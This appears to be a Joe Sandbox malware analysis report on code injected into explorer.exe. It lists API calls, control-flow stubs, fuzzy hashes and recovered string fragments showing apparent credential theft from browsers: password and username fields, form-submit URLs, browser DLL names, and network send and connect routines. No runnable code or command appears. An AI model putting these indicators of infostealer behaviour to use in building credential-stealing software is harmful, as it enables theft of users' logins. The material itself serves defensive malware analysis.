                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 448 e74ee0a-e74ee38 449 e74ee45-e74ee6e NtProtectVirtualMemory 448->449 450 e74ee40 call e74d942 448->450 451 e74ee70-e74ee7c 449->451 452 e74ee7d-e74ee8f 449->452 450->449
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL ref: 0E74EE67
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                          • Instruction ID: 2138066b19d7eb57d23cf782534bb7663ba02dda567d64c8cebabfc85debc8c4
                                          • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                          • Instruction Fuzzy Hash: 2C01A274628B884B8B48EF2C94452A6B3E5FBCE314F000B3EE9DAC3251DB21D9024782
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • ObtainUserAgentString.URLMON ref: 0E7489A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: AgentObtainStringUser
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 2681117516-319646191
                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction ID: 9fd33638f5230fa455aa7d8d8bb2fb67978f19c4115593f099c39a999240bbed
                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction Fuzzy Hash: DC31D171614A0C8FCB05EFA8D8887EDB7E0FB98214F40062AD44ED7260DF748A45CB8A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • ObtainUserAgentString.URLMON ref: 0E7489A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: AgentObtainStringUser
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 2681117516-319646191
                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction ID: 9823a9530167c6474351315ab007edc87af5e2816a3fcfc88cb18879de195e13
                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction Fuzzy Hash: 6321B6B0614A4C8FCF15EFA8D8487EDBBE1FF58204F40461AE45AD7260DF748A45CB86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateMutex
                                          • String ID: .dll$el32$kern
                                          • API String ID: 1964310414-1222553051
                                          • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                          • Instruction ID: 83dda7d353e71741d6cf734857518a36b4cd0d38c174a5f942de2d93fa4c42eb
                                          • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                          • Instruction Fuzzy Hash: 114160B0918A088FDB54EFA8C8987AD77E0FF98300F04457AC84EDB265EF309945CB45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateMutex
                                          • String ID: .dll$el32$kern
                                          • API String ID: 1964310414-1222553051
                                          • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                          • Instruction ID: 8e5f93b242c717ce272b81ff13b887f88f50c0764ea7919c402da143176a14b8
                                          • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                          • Instruction Fuzzy Hash: 7A412CB0918A088FDB58EFA8C498BAD77E0FF98300F44456AC84ADB265DF309945CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 289 e74a72e-e74a768 290 e74a788-e74a7ab connect 289->290 291 e74a76a-e74a782 call e74d942 289->291 291->290
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: connect
                                          • String ID: conn$ect
                                          • API String ID: 1959786783-716201944
                                          • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                          • Instruction ID: 3098f6ee6b116dcfd8e5817c956b2396a54fdab6a6aa507c2301cdfdd287c040
                                          • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                          • Instruction Fuzzy Hash: B9014C70618B188FCB94EF1CE088B55B7E0EB58314F1545AE990DCB226C774C9818BC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 294 e74a732-e74a768 295 e74a788-e74a7ab connect 294->295 296 e74a76a-e74a782 call e74d942 294->296 296->295
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: connect
                                          • String ID: conn$ect
                                          • API String ID: 1959786783-716201944
                                          • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                          • Instruction ID: 9e4019a85937fe3c97f768a11216037b63b2d454b8be5501f929ad3a87270861
                                          • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                          • Instruction Fuzzy Hash: EC012C70618A1C8FCB98EF5CE088B55B7E0FB59314F1545AEA90DCB226DB74CD818BC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 407 e74a6b2-e74a6e5 408 e74a705-e74a72d send 407->408 409 e74a6e7-e74a6ff call e74d942 407->409 409->408
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID: send
                                          • API String ID: 2809346765-2809346765
                                          • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                          • Instruction ID: cf8b99fdddef0e4df359dfb0a314980ed6e5efd93393e35b0aa01ea2d2f03df5
                                          • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                          • Instruction Fuzzy Hash: C701127055CA188FDB98EF1CD448B2577E0EB58314F1545AED85DCB266D670D8818B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 412 e74a5b2-e74a5ea 413 e74a5ec-e74a604 call e74d942 412->413 414 e74a60a-e74a62b socket 412->414 413->414
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: socket
                                          • String ID: sock
                                          • API String ID: 98920635-2415254727
                                          • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                          • Instruction ID: b51f5cd48a23e4ea99ed5368636c90eac840d45977e5eeceb466b6b2ea5d6e69
                                          • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                          • Instruction Fuzzy Hash: C4012C70618A188FCB84EF1CE048B54BBE0FB59314F1545AEE85ECB276D7B0C9818B86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                          • Instruction ID: 57632453a1b4283bbbd15caacf74282c0764bc553fdfe42aa30427c466b721f2
                                          • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                          • Instruction Fuzzy Hash: 27316BB0614B89DFDB64EF6980882A5B7B1FB54300F44467ED92DCB127CB7498A0CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 453 e742412-e742446 call e74d942 456 e742473-e74247d 453->456 457 e742448-e742472 call e74fc9e CreateThread 453->457
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                          • Instruction ID: 4112837df2c075012d48108ed7cef860a2a922648eea7cf36a3bdf2313912466
                                          • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                          • Instruction Fuzzy Hash: 78F0C270268A484FD788EF2CD44562AF3D0EBE9214F440A3EA98DC3265DA29C9824716
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                          • API String ID: 0-393284711
                                          • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                          • Instruction ID: b2a75cd76f74d11aec05d5afb279a019a01dea7567e238e152d877e62ad4b584
                                          • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                          • Instruction Fuzzy Hash: 6DE16D70518F588FC769EF68D4947ABB7E1FB98300F404A2E95ABC7281DF30A901CB49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                          • API String ID: 0-2916316912
                                          • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                          • Instruction ID: 2ffc0c1b5c371726df0591d79ca5f336ad743b038712e94e72484be43c1e825f
                                          • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                          • Instruction Fuzzy Hash: B6B15E30518B488EDB59EF68D489AEEB7F1FF98300F50891ED49AC7291EF709905CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                          • API String ID: 0-1539916866
                                          • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                          • Instruction ID: ffbbbfd29725afc75f16ec463d16e7afe20ecc294d865a26257c2a5aabf88fb7
                                          • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                          • Instruction Fuzzy Hash: A741BE70A18B18CFDB18DF88A4596BE7BE2FB89700F00025ED809D3385DBB59D458BD6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                          • API String ID: 0-355182820
                                          • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                          • Instruction ID: f1c9f85365a634892f2db9e2f73eda8c99a84def0e88a00f7048ce8754656506
                                          • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                          • Instruction Fuzzy Hash: 15C16D70618B198FC75CEF64D495ADBF3E1FB98304F404A2E95AAC7250DF30A915CB8A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                          • API String ID: 0-97273177
                                          • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                          • Instruction ID: 3463bcc218511c57343692e12ed4988b5290904f45cf0a3e8cc87d15b1bc3fed
                                          • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                          • Instruction Fuzzy Hash: 8D51A2316187488FD71DDF18D4856ABB7E5FBC5700F501A2EE89B87282DBB49906CB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                          • API String ID: 0-639201278
                                          • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                          • Instruction ID: 71cbe13576314dd0da3d4eeae95855a0bcbfaa1a074db1de02439ee18b53a670
                                          • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                          • Instruction Fuzzy Hash: E3C19470618A298FC75CEF68E455AABB3E1FF98300F45472D940AC7295DF309D01CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                          • API String ID: 0-639201278
                                          • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                          • Instruction ID: 4cf579ba5ee6b65db5b5a1877b5ac32823e992a82ab9660a8bb6c10575faf7da
                                          • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                          • Instruction Fuzzy Hash: E0C18470618A294FC75CEF68E455AEAB3E1FF98300F45472D944AC7295DF30AE058B89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: UR$2$L: $Pass$User$name$word
                                          • API String ID: 0-2058692283
                                          • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                          • Instruction ID: 175208e65fcd98e6419fd83ea8025b923138f5a511d302ddc1820acb28cee595
                                          • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                          • Instruction Fuzzy Hash: 77A1B1706187588FDB29EF68E4447EEB7E1FF98300F404A2DE48AD7291EF7099458789
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: UR$2$L: $Pass$User$name$word
                                          • API String ID: 0-2058692283
                                          • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                          • Instruction ID: 94b4d155b6cdf8942c78e029983ce60070ddd7038a86361e1059a7381f1d860e
                                          • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                          • Instruction Fuzzy Hash: C09181706187588FDB29EFA8E4447EEB7E1FF98300F40462DE44AD7291DF7099458789
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $.$e$n$v
                                          • API String ID: 0-1849617553
                                          • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                          • Instruction ID: ea9b7dd55037a2bc9f7b8d5a0ae135b9353c08abe2796b76f0796ede774e0d7a
                                          • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                          • Instruction Fuzzy Hash: 6F71A231618B488FD759EFA8D4847AAB7F1FF98305F000A2ED44AC72A1EB71DD458B85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2.dl$dll$l32.$ole3$shel
                                          • API String ID: 0-1970020201
                                          • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                          • Instruction ID: 659249ed5ae0f4c8da96b12d9a1093d5a08f2b9bcefba7958f67e40e6ccb7d6d
                                          • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                          • Instruction Fuzzy Hash: F2516EB0918B4C8FDB55EFA4D045AEEB7F1FF58300F404A2E959AE7254EF3095418B89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4$\$dll$ion.$vers
                                          • API String ID: 0-1610437797
                                          • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                          • Instruction ID: 74bd294aed3119d28e009dfc00f03828702b41dbac5e61af7588a519ed89ae4d
                                          • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                          • Instruction Fuzzy Hash: BC416F30218B488FCB69EF6498557EB73E5FF98301F454A2E999EC7240EF30D9058B86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 32.d$cli.$dll$sspi$user
                                          • API String ID: 0-327345718
                                          • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                          • Instruction ID: 4e57932f35acf4b7ebb6078e1848906616329b616556b2b1974dcd2593548209
                                          • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                          • Instruction Fuzzy Hash: 53418D70A19E1D8FCB59EF68A0953AE73E5FB59300F40056EA80ADB381DA30D941CB86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .dll$el32$h$kern
                                          • API String ID: 0-4264704552
                                          • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                          • Instruction ID: 92a81f326cb1ce124c108c529b0aefd14f1425c50abb5464053d5e3d38f3b3cc
                                          • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                          • Instruction Fuzzy Hash: 2B41AF70608B488FDB68DF2880883BAB7E1FB98301F104A2ED69EC3655DB70C845CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $Snif$f fr$om:
                                          • API String ID: 0-3434893486
                                          • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                          • Instruction ID: af852fd49e9efeaac839150272a37fdd4ca1fc6158635bc40a36dda397b24a73
                                          • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                          • Instruction Fuzzy Hash: F031C37151CB485FD71AEB68D4846DBB7D4FB84300F504D1EE49BC7292EE30A94ACB46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $Snif$f fr$om:
                                          • API String ID: 0-3434893486
                                          • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                          • Instruction ID: 1176a9991082e4923ac8954ff2b343783543a160d8584bc7878a370cb16b6e74
                                          • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                          • Instruction Fuzzy Hash: AC31C271518B486FD72DEB28D4946EBB7D4FB94300F504D2EE49BC7292EE30E906CA46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .dll$chro$hild$me_c
                                          • API String ID: 0-3136806129
                                          • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                          • Instruction ID: 35f9c43a98aff7ffe2ef822c62505e7f14d581a7c957be029b1f8c26350f52d9
                                          • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                          • Instruction Fuzzy Hash: 8A314C30118B684FCB88EB689494BABB7E1FBD8300F84492D944AC7295DF30CA45C756
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .dll$chro$hild$me_c
                                          • API String ID: 0-3136806129
                                          • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                          • Instruction ID: 5059fa77b8ffe144857036e20b283e32e2b16a5c6040016fdacf2dd6f362d4d9
                                          • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                          • Instruction Fuzzy Hash: 2A313C70118B684FC798EF689494BABB7E1FFD8300F844A2D944AC7295DF30CA45C756
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 0-319646191
                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction ID: 68f91156532714606da0086161c8649a4ae498728fdbb13b9cd96c36683e110d
                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
